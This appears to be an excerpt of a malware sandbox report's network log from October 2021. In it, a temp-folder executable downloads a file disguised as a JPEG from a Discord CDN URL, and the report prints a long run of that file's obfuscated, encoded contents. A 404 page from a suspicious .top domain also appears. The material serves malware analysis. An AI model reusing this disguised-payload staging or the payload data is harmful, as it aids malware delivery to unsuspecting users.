                                                                                                                          Data Ascii: 190<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at hajezey1.top Port 80</address></body></html>0


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                          0192.168.2.749810162.159.129.233443C:\Users\user\AppData\Local\Temp\2049.exe
                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                          2021-10-29 15:06:42 UTC0OUTGET /attachments/893177342426509335/903575517888925756/6D9E3C88.jpg HTTP/1.1
                                                                                                                          Host: cdn.discordapp.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2021-10-29 15:06:42 UTC0INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 29 Oct 2021 15:06:42 GMT
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 1023400
                                                                                                                          Connection: close
                                                                                                                          CF-Ray: 6a5d4f321d42692b-FRA
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Age: 20362
                                                                                                                          Cache-Control: public, max-age=31536000
                                                                                                                          ETag: "4c1a9946a2a50a9bee099f80736b83cb"
                                                                                                                          Expires: Sat, 29 Oct 2022 15:06:42 GMT
                                                                                                                          Last-Modified: Fri, 29 Oct 2021 09:26:31 GMT
                                                                                                                          Vary: Accept-Encoding
                                                                                                                          CF-Cache-Status: HIT
                                                                                                                          Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                          Cf-Bgj: h2pri
                                                                                                                          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                          x-goog-generation: 1635499591138366
                                                                                                                          x-goog-hash: crc32c=ewuz5A==
                                                                                                                          x-goog-hash: md5=TBqZRqKlCpvuCZ+Ac2uDyw==
                                                                                                                          x-goog-metageneration: 1
                                                                                                                          x-goog-storage-class: STANDARD
                                                                                                                          x-goog-stored-content-encoding: identity
                                                                                                                          x-goog-stored-content-length: 1023400
                                                                                                                          X-GUploader-UploadID: ADPycdvJxlr9khbKEXfSQ9n_bxglLL7dSGVIxF6rk63UtNA6boJtNKCUIT3dV9e0Gr4n6Y4UdNwOh6zGJyRPl1vLRno
                                                                                                                          X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=w3yJ2Ap%2BOV2IaGmdG0YTdbQF1WQ%2BCLfORrjA%2FN4tRHkYZzHPO4vcwwXRv8Ghfke3aAL929S3HWMwrXIz44XEERqhPYFPTQhxtj9C%2FWiKeNycn090l6nj8lnCjXZwAOdWvWEUxA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                          2021-10-29 15:06:42 UTC1INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                          Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                          2021-10-29 15:06:42 UTC1INData Raw: 4f 71 4a 70 6d 57 44 45 58 4d 2d 45 45 20 4d 4f 20 71 6d 6d 20 4f 20 70 20 4f 20 4f 20 4f 20 6d 20 4f 20 4f 20 4f 20 4a 57 57 20 4a 57 57 20 4f 20 4f 20 71 58 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 44 6d 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 71 4a 58 20 4f 20 4f 20 4f 20 71 6d 20 70 71 20 71 58 44 20 71 6d 20 4f 20 71 58 4f 20 4d 20 4a 4f 57 20 70 70 20 71 58 6d 20 71 20 45 44 20 4a 4f 57 20 70 70 20 58 6d 20 71 4f 6d 20 71 4f 57 20 71 71 57 20 70 4a 20 71 71 4a 20 71 71 6d 20 71 71 71 20 71 4f 70 20 71 71 6d 20 4d 45 20 71 4f 4d 20 70 4a 20 4d 4d 20 4d 45 20 71 71 4f 20 71
                                                                                                                          Data Ascii: OqJpmWDEXM-EE MO qmm O p O O O m O O O JWW JWW O O qXm O O O O O O O Dm O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O qJX O O O qm pq qXD qm O qXO M JOW pp qXm q ED JOW pp Xm qOm qOW qqW pJ qqJ qqm qqq qOp qqm ME qOM pJ MM ME qqO q
                                                                                                                          2021-10-29 15:06:42 UTC2INData Raw: 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4f 20 4a 57 20 6d 4f 20 4a 4a 4d 20 71 4f 4d 20 71 71 57 20 57 4f 20 6d 58 20 57 4f 20 57 4f 20 58 6d 20 71 71 6d 20 71 71 45 20 71 6d 44 20 71 6d 70 20 57 4f 20 6d 58 20 71 70 58 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 4a 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f
                                                                                                                          Data Ascii: O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O O JW mO JJM qOM qqW WO mX WO WO Xm qqm qqE qmD qmp WO mX qpX Wm Xm qqm qqE qOM qqJ WO qqJ WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO
                                                                                                                          2021-10-29 15:06:42 UTC4INData Raw: 4d 20 71 71 4a 20 57 4f 20 45 44 20 71 58 70 20 57 57 20 58 6d 20 71 71 6d 20 58 57 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 58 6d 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 71 58 20 57 6d 20 58 6d 20 71 58 20 4d 71 20 70 71 20 70 20 44 6d 20 58 70 20 57 4f 20 57 6d 20 58 6d 20 71 45 58 20 71 71 58 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 6d 4f 20 57 71 20 57 6d 20 58 6d 20 71 71 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 71 4d 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 57 70 20 71 4f 4d 20 71 71 4a 20 71 71 6d 20
                                                                                                                          Data Ascii: M qqJ WO ED qXp WW Xm qqm XW qOM qqJ WO qXm Wq Wm Xm qqX qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX qX Wm Xm qX Mq pq p Dm Xp WO Wm Xm qEX qqX qOM qqJ WO JmO Wq Wm Xm qqX qqE qOM qqJ qMO mM WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm Wp qOM qqJ qqm
                                                                                                                          2021-10-29 15:06:42 UTC5INData Raw: 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f
                                                                                                                          Data Ascii: O mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO Wm Xm qqm qqE qOM qqJ WO mX WO
                                                                                                                          2021-10-29 15:06:42 UTC6INData Raw: 57 44 20 70 4d 20 70 45 20 6d 45 20 4a 71 45 20 6d 4a 20 71 71 45 20 71 4f 4d 20 71 71 70 20 4a 70 20 70 58 20 44 6d 20 57 57 20 58 6d 20 71 71 6d 20 57 20 70 71 20 6d 71 20 57 4f 20 6d 58 20 44 44 20 45 4a 20 45 6d 20 71 71 6d 20 71 71 45 20 71 4f 70 20 58 58 20 6d 57 20 6d 58 20 57 4f 20 44 4f 20 4a 6d 44 20 58 45 20 4d 58 20 70 71 20 71 20 57 4f 20 6d 58 20 44 44 20 44 58 20 4a 57 71 20 71 71 6d 20 71 71 45 20 4a 4d 20 71 6d 20 6d 6d 20 6d 58 20 57 4f 20 44 4f 20 71 4a 6d 20 71 4f 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 71 6d 6d 20 4a 71 20 6d 4a 20 44 58 20 71 6d 45 20 71 71 6d 20 71 71 45 20 4a 4d 20 4a 20 57 70 20 6d 4d 20 57 4f 20 45 4f 20 6d 4a 20 71 4f 58 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 6d 45 20 57 4f 20 57 6d 20 4d 6d 20 4a 4f
                                                                                                                          Data Ascii: WD pM pE mE JqE mJ qqE qOM qqp Jp pX Dm WW Xm qqm W pq mq WO mX DD EJ Em qqm qqE qOp XX mW mX WO DO JmD XE MX pq q WO mX DD DX JWq qqm qqE JM qm mm mX WO DO qJm qOM qqE qOM qJJ qmm Jq mJ DX qmE qqm qqE JM J Wp mM WO EO mJ qOX qqE qOM qJJ JD mE WO Wm Mm JO
                                                                                                                          2021-10-29 15:06:42 UTC8INData Raw: 6d 20 71 71 6d 20 71 71 70 20 44 4d 20 71 71 6d 20 57 4f 20 6d 58 20 4a 57 20 58 4d 20 71 71 4a 20 71 71 57 20 71 71 45 20 71 4f 45 20 4d 45 20 57 57 20 70 70 20 57 6d 20 4a 4f 4f 20 58 4a 20 71 44 6d 20 71 71 44 20 71 4f 4d 20 71 71 58 20 44 57 20 70 4f 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 20 71 70 4d 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 71 20 70 71 20 70 70 20 71 71 6d 20 71 4a 20 71 6d 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 4f 44 20 57 4a 20 4a 70 57 20 58 57 20 71 71 6d 20 71 71 57 20 70 4f 20 4d 57 20 57 4f 20 6d 58 20 57 44 20 71 4d 20 4a 71 4a 20 71 6d 4f 20 71 71 45 20 71 4f 4d 20 71 71 44 20 4a 44 20 57 71 20 57 4f 20 57 6d 20 71 4a 45 20 4a 4d 20 4d 57 20 71 4f 58 20 71 71 4a 20 57 4a 20 70 70 20 57 57 20 70 4d 20 58 4f 20 71 6d 4f 20 71 71
                                                                                                                          Data Ascii: m qqm qqp DM qqm WO mX JW XM qqJ qqW qqE qOE ME WW pp Wm JOO XJ qDm qqD qOM qqX DW pO WO Wm Mm qJ qpM qOM qqJ Wm Jq pq pp qqm qJ qmJ qOM qqJ Wm JOD WJ JpW XW qqm qqW pO MW WO mX WD qM JqJ qmO qqE qOM qqD JD Wq WO Wm qJE JM MW qOX qqJ WJ pp WW pM XO qmO qq
                                                                                                                          2021-10-29 15:06:42 UTC9INData Raw: 20 44 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 4d 4f 20 45 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4d 20 57 70 20 70 4f 20 71 71 4f 20 71 71 6d 20 71 71 45 20 71 4f 70 20 4d 70 20 57 70 20 57 6d 20 44 70 20 4a 70 57 20 71 4a 45 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 71 6d 20 4a 44 20 57 44 20 57 4f 20 57 6d 20 58 4a 20 71 4a 44 20 71 71 6d 20 70 4f 20 4a 71 4d 20 57 4f 20 6d 58 20 57 4a 20 70 45 20 58 4f 20 4d 4d 20 71 71 70 20 71 71 70 20 4a 57 70 20 71 4f 6d 20 6d 58 20 57 4f 20 57 57 20 71 71 70 20 71 44 4a 20 4a 4a 4a 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 70 57 20 58 6d 20 71 71 6d 20 71 71 57 20 45 57 20 71 4f 4a 20 70 70 20 57 70 20 71 4f 20 4a 70
                                                                                                                          Data Ascii: DW X WO Wm Mm MO ED qOM qqJ WD WM Wp pO qqO qqm qqE qOp Mp Wp Wm Dp JpW qJE qqW qqE qOM qqm JD WD WO Wm XJ qJD qqm pO JqM WO mX WJ pE XO MM qqp qqp JWp qOm mX WO WW qqp qDJ JJJ qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX Mp qpW Xm qqm qqW EW qOJ pp Wp qO Jp
                                                                                                                          2021-10-29 15:06:42 UTC10INData Raw: 57 4a 20 57 6d 20 58 6d 20 71 71 6d 20 70 58 20 71 4f 58 20 71 71 4a 20 57 4f 20 71 4f 57 20 57 71 20 57 6d 20 58 6d 20 71 71 70 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 44 71 20 6d 58 20 57 4f 20 57 57 20 45 4d 20 44 44 20 71 71 57 20 71 4f 4d 20 57 4a 20 6d 58 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 4f 4f 20 70 4f 20 45 4d 20 57 4f 20 6d 58 20 57 44 20 44 4f 20 58 44 20 71 71 71 20 4a 6d 58 20 57 57 20 71 71 4a 20 57 4f 20 6d 4d 20 4a 70 20 4a 70 4f 20 71 6d 4f 20 71 71 6d 20 71 71 45 20 71 4f 57 20 58 58 20 57 20 6d 58 20 57 4f 20 44 4f 20 70 4d 20 45 6d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 4a 44 20 4d 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 71 20 71 71 6d 20 44 4d 20 45 6d 20 57 4f 20 6d 58 20 57 44 20 4a 45 20 58 70 20 71 71 44 20 71 4a 4f
                                                                                                                          Data Ascii: WJ Wm Xm qqm pX qOX qqJ WO qOW Wq Wm Xm qqp qqE qOM qqJ Dq mX WO WW EM DD qqW qOM WJ mX mX WO Wp Xm qqm qOO pO EM WO mX WD DO XD qqq JmX WW qqJ WO mM Jp JpO qmO qqm qqE qOW XX W mX WO DO pM Em qqE qOM qJJ JD M WO Wm Mm qJq qqm DM Em WO mX WD JE Xp qqD qJO
                                                                                                                          2021-10-29 15:06:42 UTC12INData Raw: 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 4a 71 6d 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4d 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 4a 20 45 4a 20 57 71 20 6d 58 20 57 4a 20 70 4d 20 58 70 20 4d 4d 20 71 71 70 20 71 4a 6d 20 71 71 45 20 6d 57 20 44 70 20 71 4d 71 20 71 4f 58 20 58 6d 20 71 71 6d 20 71 71 44 20 45 4a 20 71 44 4f 20 71 57 57 20 6d 58 20 57 4f 20 57 4f 20 71 4a 6d 20 44 4d 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 44 57 20 58 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 4a 71 45 20 71 4f 4d 20 71 71 4a 20 57 4a 20 57 44 20 4a 44 20 6d 58 20 58 6d 20 71 71 6d 20 71 71 57 20 4a 20 45 6d 20 57 71 20 6d
                                                                                                                          Data Ascii: qqE qOX XW JJD Jqm WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD qMp qqJ WO Wm Mp qp Xm qqm qJE J EJ Wq mX WJ pM Xp MM qqp qJm qqE mW Dp qMq qOX Xm qqm qqD EJ qDO qWW mX WO WO qJm DM qqE qOM qJJ DW X WO Wm Mm JM JqE qOM qqJ WJ WD JD mX Xm qqm qqW J Em Wq m
                                                                                                                          2021-10-29 15:06:42 UTC13INData Raw: 20 71 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 71 70 4a 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 71 4d 70 20 71 71 4a 20 57 4f 20 57 6d 20 4d 70 20 71 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4a 44 20 71 71 4d 20 70 57 20 57 57 20 6d 70 20 71 58 45 20 71 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 4a 4a 44 20 71 57 4d 20 57 4f 20 57 6d 20 58 4f 20 4d 4f 20 44 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 45 20 71 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 4a 44 20 6d 57 20 71 71 4a 20 57 4f 20 57 58 20 70 71 20 6d 71 20 44 4d 20 71 71 45 20 71 4f 58 20 4a 4a 6d 20 6d 4a 20 57 4f 20 6d 58 20 57 71 20 71 4d 20 71 70 4a 20 71 6d 6d 20 71 71 45
                                                                                                                          Data Ascii: qm qqm qqE qOX XW JJD qpJ WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD qMp qqJ WO Wm Mp qp Xm qqm qJE qJD qqM pW WW mp qXE qm qqm qqE qOX XW JJD qWM WO Wm XO MO DD qOM qqJ WD DE qO Wm Xm qJO JD mW qqJ WO WX pq mq DM qqE qOX JJm mJ WO mX Wq qM qpJ qmm qqE
                                                                                                                          2021-10-29 15:06:42 UTC14INData Raw: 44 4d 20 71 71 57 20 71 71 45 20 71 4f 4d 20 71 4f 4f 20 70 70 20 57 6d 20 70 57 20 57 4f 20 44 4d 20 71 71 4d 20 71 4f 44 20 71 4a 4f 20 4a 57 70 20 71 4f 6d 20 6d 58 20 57 4f 20 57 57 20 71 71 70 20 71 44 4a 20 71 57 45 20 71 4f 4d 20 71 71 4a 20 57 6d 20 4a 6d 20 57 20 57 6d 20 58 6d 20 71 4a 4f 20 44 20 58 57 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 57 6d 20 58 6d 20 71 71 6d 20 71 71 57 20 71 4f 71 20 58 58 20 57 4a 20 6d 58 20 57 4f 20 6d 58 20 70 58 20 71 20 71 71 4d 20 71 4f 4d 20 4f 20 45 44 20 6d 44 20 57 4f 20 57 6d 20 4d 6d 20 4a 4d 20 71 4f 44 20 71 4f 4d 20 71 71 4a 20 57 44 20 70 57 20 57 70 20 44 4d 20 71 44 20 71 71 57 20 71 71 45 20 71 4f 45 20 4d 4d 20 57 58 20 70 70 20 57 58 20 70 4d 20 58 4f 20 4d 4d 20 71 71 4a 20 71 71 6d 20 71
                                                                                                                          Data Ascii: DM qqW qqE qOM qOO pp Wm pW WO DM qqM qOD qJO JWp qOm mX WO WW qqp qDJ qWE qOM qqJ Wm Jm W Wm Xm qJO D XW qqJ WO WX Mp qWm Xm qqm qqW qOq XX WJ mX WO mX pX q qqM qOM O ED mD WO Wm Mm JM qOD qOM qqJ WD pW Wp DM qD qqW qqE qOE MM WX pp WX pM XO MM qqJ qqm q
                                                                                                                          2021-10-29 15:06:42 UTC16INData Raw: 71 71 6d 20 71 4a 45 20 71 71 6d 20 44 20 71 20 6d 4a 20 6d 58 20 70 70 20 57 4d 20 58 57 20 71 71 45 20 71 4f 4d 20 71 4a 4a 20 6d 57 20 71 20 71 20 57 45 20 58 45 20 4d 4f 20 44 4a 20 71 4f 4d 20 71 71 4a 20 57 44 20 57 4f 20 4a 44 20 6d 4f 20 58 6d 20 71 71 6d 20 71 71 57 20 71 4f 70 20 4d 71 20 44 4f 20 57 4f 20 70 44 20 70 6d 20 71 4a 6d 20 58 6d 20 71 71 45 20 71 4f 4d 20 71 71 58 20 4d 70 20 71 71 20 57 4f 20 57 6d 20 4d 6d 20 71 4a 4f 20 71 45 71 20 71 71 4f 20 58 44 20 4a 70 44 20 6d 58 20 57 4a 20 4a 58 20 58 57 20 4d 58 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57 6d 20 57 4f 20 70 20 71 71 71 20 71 71 6d 20 71 71 58 20 4d 58 20 71 71 4a 20 57 4f 20 6d 4d 20 70 70 20 44 20 58 44 20 71 71 6d 20 58 4a 20 71 4f 4d 20 71 71 4a 20 57 4f 20 57
                                                                                                                          Data Ascii: qqm qJE qqm D q mJ mX pp WM XW qqE qOM qJJ mW q q WE XE MO DJ qOM qqJ WD WO JD mO Xm qqm qqW qOp Mq DO WO pD pm qJm Xm qqE qOM qqX Mp qq WO Wm Mm qJO qEq qqO XD JpD mX WJ JX XW MX qqE qOM qqJ WO Wm WO p qqq qqm qqX MX qqJ WO mM pp D XD qqm XJ qOM qqJ WO W
                                                                                                                          2021-10-29 15:06:42 UTC17INData Raw: 4f 71 20 71 71 4a 20 57 4f 20 4a 45 20 4d 70 20 4a 6d 58 20 58 57 20 71 71 6d 20 71 71 57 20 4a 20 71 44 71 20 57 71 20 6d 58 20 57 4a 20 44 4f 20 71 70 58 20 71 71 70 20 58 70 20 71 45 4d 20 71 71 4a 20 4a 70 44 20 57 71 20 4a 4f 20 4a 70 4a 20 58 6d 20 71 71 44 20 4d 57 20 71 4f 4d 20 71 71 4a 20 57 4f 20 71 71 70 20 44 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 45 20 6d 4d 20 57 4f 20 57 6d 20 45 44 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 58 70 20 57 71 20 6d 58 20 57 4f 20 57 70 20 58 6d 20 71 71 6d 20 71 71 45 20 4d 58 20 71 71 4a 20 57 4f 20 6d 4d 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 4a 71 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 6d 20 57 71 20 57 6d 20 58 6d 20 4d 4f 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 4d 20
                                                                                                                          Data Ascii: Oq qqJ WO JE Mp JmX XW qqm qqW J qDq Wq mX WJ DO qpX qqp Xp qEM qqJ JpD Wq JO JpJ Xm qqD MW qOM qqJ WO qqp D Wm Xm qqm qqE qOM qqJ WE mM WO Wm ED qqm qqE qOM Xp Wq mX WO Wp Xm qqm qqE MX qqJ WO mM WO Wm Xm qqm qJq qOM qqJ WO mm Wq Wm Xm MO qqD qOM qqJ mM
                                                                                                                          2021-10-29 15:06:42 UTC18INData Raw: 20 6d 4f 20 71 71 6d 20 4d 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 4a 20 71 71 6d 20 4a 6d 4d 20 4a 57 57 20 71 71 4a 20 6d 4d 20 57 58 20 57 4f 20 57 6d 20 58 57 20 71 4f 57 20 44 4d 20 71 4f 57 20 71 71 4a 20 71 71 6d 20 6d 4d 20 57 4f 20 57 6d 20 4d 57 20 71 71 6d 20 71 71 45 20 71 4a 6d 20 70 20 71 4a 71 20 6d 4d 20 57 4f 20 6d 58 20 4d 6d 20 71 71 4a 20 4a 44 20 57 4a 20 71 71 4a 20 57 4f 20 57 58 20 4d 70 20 71 4f 4d 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 4a 20 45 4a 20 71 6d 57 20 6d 58 20 57 4f 20 57 6d 20 58 70 20 4a 4d 20 71 4a 4a 20 71 4f 4d 20 71 71 4a 20 57 44 20 44 58 20 70 45 20 57 6d 20 58 6d 20 71 71 57 20 71 4a 71 20 71 4f 71 20 70 71 20 71 71 4f 20 6d 58 20 57 4f 20 44 4f 20 70 58 20 4a 6d 45 20 71 71 4d
                                                                                                                          Data Ascii: mO qqm ME qOM qqJ WO mX WO Wm XJ qqm JmM JWW qqJ mM WX WO Wm XW qOW DM qOW qqJ qqm mM WO Wm MW qqm qqE qJm p qJq mM WO mX Mm qqJ JD WJ qqJ WO WX Mp qOM Xm qqm qJE qOJ EJ qmW mX WO Wm Xp JM qJJ qOM qqJ WD DX pE Wm Xm qqW qJq qOq pq qqO mX WO DO pX JmE qqM
                                                                                                                          2021-10-29 15:06:42 UTC20INData Raw: 20 71 4f 4d 20 71 71 4a 20 70 57 20 44 45 20 6d 70 20 57 6d 20 58 6d 20 71 4a 4f 20 71 4a 45 20 71 71 71 20 71 6d 20 6d 58 20 6d 4d 20 57 4f 20 57 4f 20 71 71 70 20 4d 57 20 4d 58 20 45 57 20 71 6d 20 57 71 20 6d 4d 20 57 4f 20 57 4f 20 71 45 4f 20 71 71 44 20 71 57 71 20 71 4f 58 20 71 71 4a 20 57 4a 20 44 45 20 6d 4f 20 57 6d 20 58 6d 20 71 4a 4f 20 58 4f 20 4a 70 45 20 71 71 6d 20 57 71 20 6d 58 20 57 6d 20 70 4f 20 58 57 20 71 71 6d 20 71 71 45 20 45 4f 20 70 71 20 6d 44 20 6d 58 20 57 4f 20 44 4f 20 4d 57 20 45 6d 20 44 6d 20 71 4f 58 20 71 71 4a 20 57 4f 20 57 57 20 4d 70 20 6d 70 20 58 6d 20 71 71 6d 20 71 4a 45 20 4d 45 20 71 4a 4f 20 6d 4a 20 70 4d 20 70 45 20 71 58 45 20 71 4a 20 71 71 6d 20 71 71 45 20 71 4f 58 20 58 57 20 70 44 20 6d 45 20 6d
                                                                                                                          Data Ascii: qOM qqJ pW DE mp Wm Xm qJO qJE qqq qm mX mM WO WO qqp MW MX EW qm Wq mM WO WO qEO qqD qWq qOX qqJ WJ DE mO Wm Xm qJO XO JpE qqm Wq mX Wm pO XW qqm qqE EO pq mD mX WO DO MW Em Dm qOX qqJ WO WW Mp mp Xm qqm qJE ME qJO mJ pM pE qXE qJ qqm qqE qOX XW pD mE m
                                                                                                                          2021-10-29 15:06:42 UTC21INData Raw: 4f 20 57 6d 20 71 70 58 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 6d 4f 20 57 71 20 6d 58 20 57 4f 20 57 44 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 45 4a 20 71 4f 4d 20 71 71 4a 20 57 4f 20 4a 45 20 57 71 20 57 6d 20 58 6d 20 4a 44 20 71 71 44 20 71 4f 4d 20 71 71 4a 20 6d 4d 20 6d 58 20 57 4f 20 57 6d 20 4d 6d 20 71 71 6d 20 71 71 45 20 71 4f 58 20 71 71 6d 20 57 4f 20 6d 58 20 57 4f 20 45 20 58 6d 20 71 71 6d 20 71 71 45 20 6d 4a 20 71 71 70 20 57 4f 20 6d 58 20 45 6d 20 57 57 20 58 6d 20 71 71 6d 20 71 4a 45 20 71 4f 4d 20 71 71 4a 20 57 4f 20 6d 58 20 57 4f 20 57 6d 20 58 6d 20 71 71 6d 20 71 71 45 20 71 4f 4d 20 71 71 4a 20 57 4a 20 6d 58 20 57 4f 20 57 6d 20 6d 4a 20 71 71 57
